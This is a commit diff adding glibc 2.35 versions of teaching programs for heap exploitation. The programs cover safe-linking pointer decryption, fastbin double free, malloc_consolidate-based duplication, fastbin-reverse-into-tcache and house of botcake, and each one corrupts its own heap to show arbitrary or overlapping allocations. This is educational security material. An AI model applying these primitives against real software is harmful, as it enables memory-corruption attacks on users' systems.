include glibc_2.35

Author: Kyle-Kyle

Makefile

@@ -5,7 +5,8 @@ V2.31 = glibc_2.31/fastbin_dup_consolidate glibc_2.31/fastbin_dup_into_stack gli
 V2.32 = glibc_2.32/fastbin_dup_consolidate glibc_2.32/unsafe_unlink glibc_2.32/overlapping_chunks glibc_2.32/house_of_einherjar glibc_2.32/tcache_poisoning glibc_2.32/tcache_house_of_spirit glibc_2.32/house_of_botcake glibc_2.32/tcache_stashing_unlink_attack glibc_2.32/fastbin_reverse_into_tcache glibc_2.32/mmap_overlapping_chunks glibc_2.32/fastbin_dup glibc_2.32/large_bin_attack glibc_2.32/house_of_mind_fastbin glibc_2.32/house_of_lore glibc_2.32/decrypt_safe_linking glibc_2.32/poison_null_byte
 V2.33 = glibc_2.33/fastbin_dup_consolidate glibc_2.33/unsafe_unlink glibc_2.33/overlapping_chunks glibc_2.33/house_of_einherjar glibc_2.33/tcache_poisoning glibc_2.33/tcache_house_of_spirit glibc_2.33/house_of_botcake glibc_2.33/tcache_stashing_unlink_attack glibc_2.33/fastbin_reverse_into_tcache glibc_2.33/mmap_overlapping_chunks glibc_2.33/fastbin_dup glibc_2.33/large_bin_attack glibc_2.33/house_of_mind_fastbin glibc_2.33/house_of_lore glibc_2.32/decrypt_safe_linking glibc_2.33/poison_null_byte
 V2.34 = glibc_2.34/fastbin_dup_consolidate glibc_2.34/unsafe_unlink glibc_2.34/overlapping_chunks glibc_2.34/house_of_einherjar glibc_2.34/tcache_poisoning glibc_2.34/tcache_house_of_spirit glibc_2.34/house_of_botcake glibc_2.34/tcache_stashing_unlink_attack glibc_2.34/fastbin_reverse_into_tcache glibc_2.34/mmap_overlapping_chunks glibc_2.34/fastbin_dup glibc_2.34/large_bin_attack glibc_2.34/house_of_mind_fastbin glibc_2.34/house_of_lore glibc_2.32/decrypt_safe_linking glibc_2.34/poison_null_byte
-PROGRAMS = $(BASE) $(V2.23) $(V2.27) $(V2.31) $(V2.32) $(V2.33) $(V2.34)
+V2.35 = glibc_2.35/fastbin_dup_consolidate glibc_2.35/unsafe_unlink glibc_2.35/overlapping_chunks glibc_2.35/house_of_einherjar glibc_2.35/tcache_poisoning glibc_2.35/tcache_house_of_spirit glibc_2.35/house_of_botcake glibc_2.35/tcache_stashing_unlink_attack glibc_2.35/fastbin_reverse_into_tcache glibc_2.35/mmap_overlapping_chunks glibc_2.35/fastbin_dup glibc_2.35/large_bin_attack glibc_2.35/house_of_mind_fastbin glibc_2.35/house_of_lore glibc_2.32/decrypt_safe_linking glibc_2.35/poison_null_byte
+PROGRAMS = $(BASE) $(V2.23) $(V2.27) $(V2.31) $(V2.32) $(V2.33) $(V2.34) $(V2.35)
 CFLAGS += -std=c99 -g -Wno-unused-result -Wno-free-nonheap-object
 LDLIBS += -ldl
 

glibc_2.35/decrypt_safe_linking.c

@@ -0,0 +1,63 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <assert.h>
+
+long decrypt(long cipher)
+{
+	puts("The decryption uses the fact that the first 12bit of the plaintext (the fwd pointer) is known,");
+	puts("because of the 12bit sliding.");
+	puts("And the key, the ASLR value, is the same with the leading bits of the plaintext (the fwd pointer)");
+	long key = 0;
+	long plain;
+
+	for(int i=1; i<6; i++) {
+		int bits = 64-12*i;
+		if(bits < 0) bits = 0;
+		plain = ((cipher ^ key) >> bits) << bits;
+		key = plain >> 12;
+		printf("round %d:\n", i);
+		printf("key:    %#016lx\n", key);
+		printf("plain:  %#016lx\n", plain);
+		printf("cipher: %#016lx\n\n", cipher);
+	}
+	return plain;
+}
+
+int main()
+{
+	/*
+	 * This technique demonstrates how to recover the original content from a poisoned
+	 * value because of the safe-linking mechanism.
+	 * The attack uses the fact that the first 12 bit of the plaintext (pointer) is known
+	 * and the key (ASLR slide) is the same to the pointer's leading bits.
+	 * As a result, as long as the chunk where the pointer is stored is at the same page
+	 * of the pointer itself, the value of the pointer can be fully recovered.
+	 * Otherwise, a little bit of bruteforce is required.
+	 */
+
+	setbuf(stdin, NULL);
+	setbuf(stdout, NULL);
+
+	// step 1: allocate chunks
+	long *a = malloc(0x20);
+	long *b = malloc(0x20);
+	printf("First, we create chunk a @ %p and chunk b @ %p\n", a, b);
+	malloc(0x10);
+	puts("And then create a padding chunk to prevent consolidation.");
+
+
+	// step 2: free chunks
+	puts("Now free chunk a and then free chunk b.");
+	free(a);
+	free(b);
+	printf("Now the freelist is: [%p -> %p]\n", b, a);
+	printf("Due to safe-linking, the value actually stored at b[0] is: %#lx\n", b[0]);
+
+	// step 3: recover the values
+	puts("Now decrypt the poisoned value");
+	long plaintext = decrypt(b[0]);
+
+	printf("value: %p\n", a);
+	printf("recovered value: %#lx\n", plaintext);
+	assert(plaintext == (long)a);
+}

glibc_2.35/fastbin_dup.c

@@ -0,0 +1,50 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <assert.h>
+
+int main()
+{
+	setbuf(stdout, NULL);
+
+	printf("This file demonstrates a simple double-free attack with fastbins.\n");
+
+	printf("Fill up tcache first.\n");
+	void *ptrs[8];
+	for (int i=0; i<8; i++) {
+		ptrs[i] = malloc(8);
+	}
+	for (int i=0; i<7; i++) {
+		free(ptrs[i]);
+	}
+
+	printf("Allocating 3 buffers.\n");
+	int *a = calloc(1, 8);
+	int *b = calloc(1, 8);
+	int *c = calloc(1, 8);
+
+	printf("1st calloc(1, 8): %p\n", a);
+	printf("2nd calloc(1, 8): %p\n", b);
+	printf("3rd calloc(1, 8): %p\n", c);
+
+	printf("Freeing the first one...\n");
+	free(a);
+
+	printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
+	// free(a);
+
+	printf("So, instead, we'll free %p.\n", b);
+	free(b);
+
+	printf("Now, we can free %p again, since it's not the head of the free list.\n", a);
+	free(a);
+
+	printf("Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
+	a = calloc(1, 8);
+	b = calloc(1, 8);
+	c = calloc(1, 8);
+	printf("1st calloc(1, 8): %p\n", a);
+	printf("2nd calloc(1, 8): %p\n", b);
+	printf("3rd calloc(1, 8): %p\n", c);
+
+	assert(a == c);
+}

glibc_2.35/fastbin_dup_consolidate.c

@@ -0,0 +1,41 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <assert.h>
+
+void main() {
+	// reference: https://valsamaras.medium.com/the-toddlers-introduction-to-heap-exploitation-fastbin-dup-consolidate-part-4-2-ce6d68136aa8
+	puts("This is a powerful technique that bypasses the double free check in tcachebin.");
+	printf("Fill up the tcache list to force the fastbin usage...\n");
+
+	void *ptr[7];
+
+	for(int i = 0; i < 7; i++)
+		ptr[i] = malloc(0x40);
+	for(int i = 0; i < 7; i++)
+		free(ptr[i]);
+
+	void* p1 = calloc(1,0x40);
+
+	printf("Allocate another chunk of the same size p1=%p \n", p1);
+  	printf("Freeing p1 will add this chunk to the fastbin list...\n\n");
+  	free(p1);
+
+  	void* p3 = malloc(0x400);
+	printf("Allocating a tcache-sized chunk (p3=%p)\n", p3);
+	printf("will trigger the malloc_consolidate and merge\n");
+	printf("the fastbin chunks into the top chunk, thus\n");
+	printf("p1 and p3 are now pointing to the same chunk !\n\n");
+
+	assert(p1 == p3);
+
+  	printf("Triggering the double free vulnerability!\n\n");
+	free(p1);
+
+	void *p4 = malloc(0x400);
+
+	assert(p4 == p3);
+
+	printf("The double free added the chunk referenced by p1 \n");
+	printf("to the tcache thus the next similar-size malloc will\n");
+	printf("point to p3: p3=%p, p4=%p\n\n",p3, p4);
+}

glibc_2.35/fastbin_reverse_into_tcache.c

@@ -0,0 +1,104 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <assert.h>
+
+const size_t allocsize = 0x40;
+
+int main(){
+	setbuf(stdout, NULL);
+
+	printf("\n"
+		   "This attack is intended to have a similar effect to the unsorted_bin_attack,\n"
+		   "except it works with a small allocation size (allocsize <= 0x78).\n"
+		   "The goal is to set things up so that a call to malloc(allocsize) will write\n"
+		   "a large unsigned value to the stack.\n\n");
+	printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41,\n"
+		   "An heap address leak is needed to perform this attack.\n"
+		   "The same patch also ensures the chunk returned by tcache is properly aligned.\n\n");
+
+	// Allocate 14 times so that we can free later.
+	char* ptrs[14];
+	size_t i;
+	for (i = 0; i < 14; i++) {
+		ptrs[i] = malloc(allocsize);
+	}
+	
+	printf("First we need to free(allocsize) at least 7 times to fill the tcache.\n"
+	  	   "(More than 7 times works fine too.)\n\n");
+	
+	// Fill the tcache.
+	for (i = 0; i < 7; i++) free(ptrs[i]);
+	
+	char* victim = ptrs[7];
+	printf("The next pointer that we free is the chunk that we're going to corrupt: %p\n"
+		   "It doesn't matter if we corrupt it now or later. Because the tcache is\n"
+		   "already full, it will go in the fastbin.\n\n", victim);
+	free(victim);
+	
+	printf("Next we need to free between 1 and 6 more pointers. These will also go\n"
+		   "in the fastbin. If the stack address that we want to overwrite is not zero\n"
+		   "then we need to free exactly 6 more pointers, otherwise the attack will\n"
+		   "cause a segmentation fault. But if the value on the stack is zero then\n"
+		   "a single free is sufficient.\n\n");
+	
+	// Fill the fastbin.
+	for (i = 8; i < 14; i++) free(ptrs[i]);
+	
+	// Create an array on the stack and initialize it with garbage.
+	size_t stack_var[6];
+	memset(stack_var, 0xcd, sizeof(stack_var));
+	
+	printf("The stack address that we intend to target: %p\n"
+		   "It's current value is %p\n", &stack_var[2], (char*)stack_var[2]);
+	
+	printf("Now we use a vulnerability such as a buffer overflow or a use-after-free\n"
+			"to overwrite the next pointer at address %p\n\n", victim);
+	
+	//------------VULNERABILITY-----------
+	
+	// Overwrite linked list pointer in victim.
+	// The following operation assumes the address of victim is known, thus requiring
+	// a heap leak.
+	*(size_t**)victim = (size_t*)((long)&stack_var[0] ^ ((long)victim >> 12));
+	
+	//------------------------------------
+	
+	printf("The next step is to malloc(allocsize) 7 times to empty the tcache.\n\n");
+	
+	// Empty tcache.
+	for (i = 0; i < 7; i++) ptrs[i] = malloc(allocsize);
+	
+	printf("Let's just print the contents of our array on the stack now,\n"
+			"to show that it hasn't been modified yet.\n\n");
+	
+	for (i = 0; i < 6; i++) printf("%p: %p\n", &stack_var[i], (char*)stack_var[i]);
+	
+	printf("\n"
+		   "The next allocation triggers the stack to be overwritten. The tcache\n"
+		   "is empty, but the fastbin isn't, so the next allocation comes from the\n"
+		   "fastbin. Also, 7 chunks from the fastbin are used to refill the tcache.\n"
+		   "Those 7 chunks are copied in reverse order into the tcache, so the stack\n"
+		   "address that we are targeting ends up being the first chunk in the tcache.\n"
+		   "It contains a pointer to the next chunk in the list, which is why a heap\n"
+		   "pointer is written to the stack.\n"
+		   "\n"
+		   "Earlier we said that the attack will also work if we free fewer than 6\n"
+		   "extra pointers to the fastbin, but only if the value on the stack is zero.\n"
+		   "That's because the value on the stack is treated as a next pointer in the\n"
+		   "linked list and it will trigger a crash if it isn't a valid pointer or null.\n"
+		   "\n"
+		   "The contents of our array on the stack now look like this:\n\n");
+	
+	malloc(allocsize);
+	
+	for (i = 0; i < 6; i++) printf("%p: %p\n", &stack_var[i], (char*)stack_var[i]);
+	
+	char *q = malloc(allocsize);
+	printf("\n"
+			"Finally, if we malloc one more time then we get the stack address back: %p\n", q);
+	
+	assert(q == (char *)&stack_var[2]);
+	
+	return 0;
+}

glibc_2.35/house_of_botcake.c

@@ -0,0 +1,75 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <unistd.h>
+#include <assert.h>
+
+
+int main()
+{
+    /*
+     * This attack should bypass the restriction introduced in
+     * https://sourceware.org/git/?p=glibc.git;a=commit;h=bcdaad21d4635931d1bd3b54a7894276925d081d
+     * If the libc does not include the restriction, you can simply double free the victim and do a
+     * simple tcache poisoning
+     * And thanks to @anton00b and @subwire for the weird name of this technique */
+
+    // disable buffering so _IO_FILE does not interfere with our heap
+    setbuf(stdin, NULL);
+    setbuf(stdout, NULL);
+
+    // introduction
+    puts("This file demonstrates a powerful tcache poisoning attack by tricking malloc into");
+    puts("returning a pointer to an arbitrary location (in this demo, the stack).");
+    puts("This attack only relies on double free.\n");
+
+    // prepare the target
+    intptr_t stack_var[4];
+    puts("The address we want malloc() to return, namely,");
+    printf("the target address is %p.\n\n", stack_var);
+
+    // prepare heap layout
+    puts("Preparing heap layout");
+    puts("Allocating 7 chunks(malloc(0x100)) for us to fill up tcache list later.");
+    intptr_t *x[7];
+    for(int i=0; i<sizeof(x)/sizeof(intptr_t*); i++){
+        x[i] = malloc(0x100);
+    }
+    intptr_t *prev = malloc(0x100);
+    printf("Allocating a chunk for later consolidation: prev @ %p\n", prev);
+    intptr_t *a = malloc(0x100);
+    printf("Allocating the victim chunk: a @ %p\n", a);
+    puts("Allocating a padding to prevent consolidation.\n");
+    malloc(0x10);
+    
+    // cause chunk overlapping
+    puts("Now we are able to cause chunk overlapping");
+    puts("Step 1: fill up tcache list");
+    for(int i=0; i<7; i++){
+        free(x[i]);
+    }
+    puts("Step 2: free the victim chunk so it will be added to unsorted bin");
+    free(a);
+    
+    puts("Step 3: free the previous chunk and make it consolidate with the victim chunk.");
+    free(prev);
+    
+    puts("Step 4: add the victim chunk to tcache list by taking one out from it and free victim again\n");
+    malloc(0x100);
+    /*VULNERABILITY*/
+    free(a);// a is already freed
+    /*VULNERABILITY*/
+
+    puts("Now we have the chunk overlapping primitive:");
+    int prev_size = prev[-1] & 0xff0;
+    int a_size = a[-1] & 0xff0;
+    printf("prev @ %p, size: %#x, end @ %p\n", prev, prev_size, (void *)prev+prev_size);
+    printf("victim @ %p, size: %#x, end @ %p\n", a, a_size, (void *)a+a_size);
+    a = malloc(0x100);
+    memset(a, 0, 0x100);
+    prev[0x110/sizeof(intptr_t)] = 0x41414141;
+    assert(a[0] == 0x41414141);
+
+    return 0;
+}